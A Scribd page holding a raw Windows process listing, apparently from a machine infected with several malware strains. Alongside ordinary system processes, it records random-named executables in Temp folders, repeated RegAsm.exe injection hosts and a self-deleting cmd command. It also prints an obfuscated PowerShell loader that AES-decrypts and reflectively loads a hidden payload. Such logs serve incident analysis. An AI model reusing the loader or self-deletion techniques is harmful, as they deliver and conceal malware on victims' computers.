Scribd
Upload
111 views

Process List

The document lists process information from a system, including the process ID, name, and command line. It includes common system processes like csrss.exe, winlogon.exe, and explorer.exe as well as applications like RiotClientServices.exe, AdobeIPCBroker.exe, and TotalCMD.exe. A variety of other processes are also referenced, indicating it is summarizing process information from an active system.

Uploaded by

matheus23kayna
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
111 views

Process List

The document lists process information from a system, including the process ID, name, and command line. It includes common system processes like csrss.exe, winlogon.exe, and explorer.exe as well as applications like RiotClientServices.exe, AdobeIPCBroker.exe, and TotalCMD.exe. A variety of other processes are also referenced, indicating it is summarizing process information from an active system.

Uploaded by

matheus23kayna
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 7

ID: 912, Name: csrss.

exe, CommandLine:
===============
ID: 1172, Name: winlogon.exe, CommandLine:
===============
ID: 1228, Name: fontdrvhost.exe, CommandLine:
===============
ID: 1300, Name: dwm.exe, CommandLine:
===============
ID: 2644, Name: atieclxx.exe, CommandLine:
===============
ID: 7072, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 6544, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 6924, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 6868, Name: AsusDownLoadLicense.exe, CommandLine: C:\Windows\system32\
AsusDownLoadLicense.exe -asus2357start -hide
===============
ID: 3664, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 7432, Name: ctfmon.exe, CommandLine:
===============
ID: 7688, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 7952, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 8208, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 8432, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8636, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 8764, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9992, Name: PhoneExperienceHost.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.YourPhone_1.23112.87.0_x64__8wekyb3d8bbwe\
PhoneExperienceHost.exe" -ComServer:Background -Embedding
===============
ID: 9468, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 10340, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 10888, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 11332, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 11484, Name: tvnserver.exe, CommandLine: "C:\Program Files\TightVNC\
tvnserver.exe" -controlservice -slave
===============
ID: 11544, Name: AvastUI.exe, CommandLine: AvastUI.exe /nogui
===============
ID: 11568, Name: vgtray.exe, CommandLine: "C:\Program Files\Riot Vanguard\
vgtray.exe"
===============
ID: 11616, Name: OneDrive.exe, CommandLine: "C:\Users\User\AppData\Local\Microsoft\
OneDrive\OneDrive.exe" /background
===============
ID: 12032, Name: CCXProcess.exe, CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\CCXProcess.exe"
===============
ID: 12048, Name: node.exe, CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\libs\node.exe" "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\js\main.js"
===============
ID: 12056, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 12132, Name: RiotClientServices.exe, CommandLine: "C:\Riot Games\Riot Client\
RiotClientServices.exe" --launch-background-mode
===============
ID: 12236, Name: AdobeIPCBroker.exe, CommandLine: "C:\Program Files (x86)\Common
Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe" "-launchedbyvulcan-
12048 C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\libs\node.exe"
===============
ID: 1576, Name: RiotClientCrashHandler.exe, CommandLine: "C:\Riot Games\Riot
Client\RiotClientCrashHandler.exe" --no-rate-limit "--attachment=2024-01-28T23-18-
08_12132_Riot_Client.0.log=C:/Users/User/AppData/Local/Riot Games/Riot
Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot Client.0.log" "--
attachment=2024-01-28T23-18-08_12132_Riot_Client.log=C:/Users/User/AppData/Local/
Riot Games/Riot Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot
Client.log" "--attachment=__sentry-breadcrumb1=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-376224f92530.run\
__sentry-breadcrumb1" "--attachment=__sentry-breadcrumb2=C:\Users\User\AppData\
Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
376224f92530.run\__sentry-breadcrumb2" "--attachment=__sentry-event=C:\Users\User\
AppData\Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
376224f92530.run\__sentry-event" "--database=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client" "--metrics-dir=C:\Users\User\AppData\Local\
Riot Games\Riot Client\Crashes\Riot Client"
--url=https://sentry.io:443/api/1339107/minidump/?
sentry_key=dc54709324504ab18ddf517a83f99e1a --initial-client-
data=0x378,0x3f8,0x3c8,0x384,0x3e0,0x6f64ed88,0x6f64ed98,0x6f64eda8
===============
ID: 12968, Name: TokenUtil.exe, CommandLine: "C:\Program Files\TrustEdgeID\
TokenUtil.exe"
===============
ID: 13048, Name: jusched.exe, CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\jusched.exe"
===============
ID: 13108, Name: NativeInstrumentsUsbAudioCpl.exe, CommandLine: "C:\Program Files\
Native Instruments\Komplete Audio Driver\W10_x64\NativeInstrumentsUsbAudioCpl.exe"
-hide
===============
ID: 13220, Name: RadeonSoftware.exe, CommandLine: "C:\Program Files\AMD\CNext\
CNext\Radeonsoftware.exe" atlogon
===============
ID: 4892, Name: cncmd.exe, CommandLine: "C:\Program Files\AMD\CNext\CNext\
cncmd.exe" watch 13220
===============
ID: 12700, Name: AMDRSServ.exe, CommandLine:
===============
ID: 7664, Name: amdow.exe, CommandLine:
===============
ID: 1188, Name: MSOSYNC.EXE, CommandLine: "C:\Program Files\Microsoft Office\
Office15\MsoSync.exe"
===============
ID: 2860, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 11460, Name: Microsoft.Media.Player.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.ZuneMusic_11.2312.7.0_x64__8wekyb3d8bbwe\
Microsoft.Media.Player.exe" -
ServerName:Microsoft.ZuneMusic.AppXr954g6gg1tvs748d5g67zt981dvpmnr6.mca
===============
ID: 8372, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9348, Name: svchost.exe, CommandLine: C:\Windows\System32\svchost.exe -k
UnistackSvcGroup
===============
ID: 12828, Name: dllhost.exe, CommandLine: C:\Windows\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 10116, Name: jucheck.exe, CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\jucheck.exe" -auto
===============
ID: 13648, Name: QtWebEngineProcess.exe, CommandLine: "C:\Program Files\AMD\CNext\
CNext\QtWebEngineProcess.exe" --type=utility --enable-
features=AllowContentInitiatedDataUrlNavigations,TracingServiceInProcess --disable-
features=BackgroundFetch,ConsolidatedMovementXY,DnsOverHttpsUpgrade,FormControlsRef
resh,MojoVideoCapture,PictureInPicture,SmsReceiver,UseSkiaRenderer,WebPayments,WebU
SB --lang=sr --service-sandbox-type=network --use-gl=angle --application-
name=Radeonsoftware --webengine-schemes=qrc:sLV --mojo-platform-channel-handle=5208
/prefetch:8
===============
ID: 4216, Name: AMDRSSrcExt.exe, CommandLine: "C:\Program Files\AMD\CNext\CNext\
AMDRSSrcExt.exe" fb28e830-7c29-4591-b2df-4e16275fa0d9 SOFTWARE\AMD\DVR\Overlays
===============
ID: 8616, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 9880, Name: TOTALCMD.EXE, CommandLine: "E:\Instalacije\Totalcmd\TOTALCMD.EXE"
===============
ID: 5152, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=gpu-process --field-trial-
handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --no-sandbox --disable-gpu-driver-bug-
workarounds --log-file="C:\Users\User\AppData\Roaming\Avast Software\Avast\log\
cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0 AppleWebKit/537.36
(KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium (0.0.0) (Windows
10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --force-wave-audio
--disable-software-rasterizer --no-sandbox --blacklist-accelerated-compositing --
disable-accelerated-2d-canvas --disable-accelerated-compositing --disable-
accelerated-layers --disable-accelerated-video-decode --blacklist-webgl --disable-
bundled-ppapi-flash --disable-flash-3d --enable-aggressive-domstorage-flushing --
enable-media-stream --disable-gpu --disable-webgl --disable-gpu-compositing --
allow-file-access-from-files=1 --pack_loading_disabled=1 --gpu-
preferences=SAAAAAAAAADgAABwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAA
AAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIA
AAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --log-file="C:\Users\User\AppData\
Roaming\Avast Software\Avast\log\cef_log.txt" --mojo-platform-channel-
handle=8416 /prefetch:2
===============
ID: 4712, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=utility --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8608 /prefetch:8
===============
ID: 12392, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=none --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8660 /prefetch:8
===============
ID: 9868, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-
trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=audio --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=10108 /prefetch:8
===============
ID: 12584, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 5060, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 13356, Name: UserOOBEBroker.exe, CommandLine: C:\Windows\System32\oobe\
UserOOBEBroker.exe -Embedding
===============
ID: 7412, Name: AdobeCollabSync.exe, CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\AdobeCollabSync.exe"
===============
ID: 3508, Name: AdobeCollabSync.exe, CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\AdobeCollabSync.exe" --type=collab-renderer --proc=7412
===============
ID: 9876, Name: DPService.exe, CommandLine:
===============
ID: 13096, Name: 1FF3.exe, CommandLine: C:\Users\User\AppData\Local\Temp\1FF3.exe
===============
ID: 4120, Name: build2.exe, CommandLine: "C:\Users\User\AppData\Local\f4728982-
a5a0-4742-973b-67968a402246\build2.exe"
===============
ID: 11312, Name: 9883.exe, CommandLine: C:\Users\User\AppData\Local\Temp\9883.exe
===============
ID: 10264, Name: explorhe.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\explorhe.exe"
===============
ID: 13132, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9576, Name: fz9YqoSLnCrtpx1uiHT8.exe, CommandLine: "C:\Users\User\AppData\
Local\Temp\jobA4aodo3bpwLTVri\fz9YqoSLnCrtpx1uiHT8.exe"
===============
ID: 12004, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
Embedding
===============
ID: 14608, Name: launcher.exe, CommandLine:
===============
ID: 14760, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 14780, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 11964, Name: btcgood.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000718001\btcgood.exe"
===============
ID: 3620, Name: 2024.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000721001\2024.exe"
===============
ID: 14900, Name: cmd.exe, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\
User\AppData\Local\Temp\file1.bat
===============
ID: 14928, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 10204, Name: conhost.exe, CommandLine: C:\Windows\system32\conhost.exe
===============
ID: 11480, Name: conhost.exe, CommandLine: conhost.exe
===============
ID: 9708, Name: file1.bat.exe, CommandLine: "file1.bat.exe" -noprofile -
windowstyle hidden -ep bypass -command $_CASH_qaVPf = [System.IO.File]::
('txeTllAdaeR'[-1..-11] -join '')('C:\Users\User\AppData\Local\Temp\
file1.bat').Split([Environment]::NewLine);foreach ($_CASH_fIZHT in $_CASH_qaVPf)
{ if ($_CASH_fIZHT.StartsWith(':: @')) { $_CASH_XqEBS = $_CASH_fIZHT.Substring(4);
break; }; };$_CASH_XqEBS =
[System.Text.RegularExpressions.Regex]::Replace($_CASH_XqEBS, '_CASH_', '');
$_CASH_AbGjb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
($_CASH_XqEBS);$_CASH_xbtcQ = New-Object System.Security.Cryptography.AesManaged;
$_CASH_xbtcQ.Mode = [System.Security.Cryptography.CipherMode]::CBC;
$_CASH_xbtcQ.Padding =
[System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_xbtcQ.Key =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
('xnU+qixX8GxmNdtUiuJWKTS5382DUH1RFgNRqJG+Kzg=');$_CASH_xbtcQ.IV =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
('q4+6cHkazpcj3F4mKI+rYw==');$_CASH_KXHue = $_CASH_xbtcQ.CreateDecryptor();
$_CASH_AbGjb = $_CASH_KXHue.TransformFinalBlock($_CASH_AbGjb, 0,
$_CASH_AbGjb.Length);$_CASH_KXHue.Dispose();$_CASH_xbtcQ.Dispose();$_CASH_kEHGI =
New-Object System.IO.MemoryStream(, $_CASH_AbGjb);$_CASH_Kscdn = New-Object
System.IO.MemoryStream;$_CASH_Lfmtj = New-Object
System.IO.Compression.GZipStream($_CASH_kEHGI,
[IO.Compression.CompressionMode]::Decompress);$_CASH_Lfmtj.CopyTo($_CASH_Kscdn);
$_CASH_Lfmtj.Dispose();$_CASH_kEHGI.Dispose();$_CASH_Kscdn.Dispose();$_CASH_AbGjb =
$_CASH_Kscdn.ToArray();$_CASH_kHyYf = [System.Reflection.Assembly]::('daoL'[-1..-4]
-join '')($_CASH_AbGjb);$_CASH_ZMxsS = $_CASH_kHyYf.EntryPoint;
$_CASH_ZMxsS.Invoke($null, (, [string[]] ('')))
===============
ID: 3688, Name: rty25.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
rty25.exe"
===============
ID: 10724, Name: powershell.exe, CommandLine: C:\Windows\system32\
WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\User\AppData\Local\
Temp\FirstZ.exe" -Verb runAs
===============
ID: 1376, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 9024, Name: consent.exe, CommandLine:
===============
ID: 13452, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 13336, Name: explorer.exe, CommandLine: explorer.exe
===============
ID: 13392, Name: consent.exe, CommandLine:
===============
ID: 12588, Name: consent.exe, CommandLine:
===============
ID: 2208, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 12296, Name: sadsadsadsa.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000726001\sadsadsadsa.exe"
===============
ID: 12448, Name: olehps.exe, CommandLine: "C:\Users\User\AppData\Roaming\
configurationValue\olehps.exe"
===============
ID: 9584, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 7984, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 3364, Name: 7b0d48dbbf50fe239f1097f5d01c2a6d.exe, CommandLine:
===============
ID: 4148, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 10660, Name: LogonUI.exe, CommandLine:
===============
ID: 4636, Name: consent.exe, CommandLine:
===============
ID: 10740, Name: cmd.exe, CommandLine: C:\Windows\system32\cmd.exe /c choice /C
Y /N /D Y /T 3 & Del "C:\Users\User\AppData\Local\Temp\1000731001\moto.exe"
===============
ID: 11744, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 11840, Name: rundll32.exe, CommandLine: "C:\Windows\System32\rundll32.exe" C:\
Users\User\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
===============
ID: 2000, Name: choice.exe, CommandLine: choice /C Y /N /D Y /T 3
===============
ID: 8036, Name: powershell.exe, CommandLine:
===============
ID: 3644, Name: conhost.exe, CommandLine:
===============
ID: 8668, Name: qemu-ga.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\qemu-ga.exe"

You might also like